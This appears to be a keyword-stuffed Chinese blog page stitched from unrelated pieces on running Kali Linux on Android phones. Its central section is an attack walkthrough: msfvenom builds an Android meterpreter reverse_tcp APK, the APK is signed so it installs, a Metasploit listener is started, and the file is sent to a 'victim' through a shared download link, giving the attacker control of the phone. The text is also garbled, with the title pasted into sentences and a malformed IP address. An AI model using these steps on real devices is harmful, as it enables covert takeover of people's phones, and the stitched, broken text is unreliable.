安卓安装kali渗透工具,kali渗透测试工具

作者:hacker | 分类:网络攻防 | 浏览:102 | 日期:2022年07月15日

一套Linux渗透教程（带你玩转Kali附安卓下Kali渗透,劫持等）(无KEY) 解压密码谢谢！

这个教程就是个注水肉安卓安装kali渗透工具，一直逼逼歪歪安卓安装kali渗透工具，没什么实货安卓安装kali渗透工具，简直就是浪费生命

kali linux怎么安装在手机上

打开linux Deploy按照下图配置好

修改分辨率

请根据自己手机的分辨率修改，这里需要注意，由于是横屏使用所以Width的值要和Height的值互换

配置好后点击Install

到文件管理器把/mnt/sdcard/目录下的linux.img删除，把下载的linux.img 移动到/mnt/sdcard/，打开linux Deploy点击STOP再点START，如下图：

可以看到SSH和VNC成功启动！

现在可以用这两个连接器连接了！把密码告诉大家：

VNC：

ip：127.0.0.1

port:5900

password:changeme

SHH

ip：127.0.0.1

port:22

user:android

password:changeme

使用 sudo su 即可切换到root

此时的Kali还没有工具，需自己安装

效果图：

Screenshot_2014-01-25-13-08-17.png(72.47 KB, 下载次数: 4)

下载附件保存到相册

2014-1-25 13:12 上传

退出后别忘了点STOP。。。

如何在安卓上安装kalilinux

下载

Linux Deploy

Download VNC Viewe

打开属性

在distribution中选择Kali Linux

如果你在 *** 镜像的时候遇到了错误，把安装路径/emulated/0替换为/emulated/legacy

现在可以点击安装了

这会花很长的一段时间. 耐心等待并且确定你的手机有足够的空间

完成了？

点击START

然后打开VNC viewer应用

添加一个新的连接

Adress：

localhost

Name:

Kali

点击connect

password:

changeme

步骤阅读

欢迎来到Kali

安卓安装kali渗透工具,kali渗透测试工具

如何使用metasploit对安卓手机进行控制

在这次的实验中安卓安装kali渗透工具，我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机：Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端，使用msfvenom *** android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令，使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后，你会看到一些错误，但不用担心。现在可以到输出目录查看生成的apk安卓安装kali渗透工具了。

我们已经成功创建了Android格式（APK）文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名：

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

Kali没有预装Zipalign，需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK，它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK，并将下载链接分享出去。

1、从下载android x86的iso。

2、使用vmware创建一个内核版本为2.6的虚拟机。

3、挂载镜像，启动虚拟机。

4、进入Live模式。

5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali，我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

手机上怎么安装kali

如果三星手机需要下载安装软件应用，建议尝试：

1.使用手机功能表中自带的浏览器上网，直接搜索需要的软件进行下载安装(下载安卓版本格式为apk)。

2.使用电脑下载APK格式的安装包，连接数据线传输至手机，操作手机在应用程序-我的文件中找到安装包，运行后点击安装按钮。

3.下载完成后点击下载的应用，根据软件手机界面中软件安装提示点击安装即可。

注：如安装软件后桌面没有生成快捷图标，手机将软件拖到主屏幕的操作 *** ：进入应用程序点住需添加到主屏的图标不松手，拖动到主屏幕后松手即可。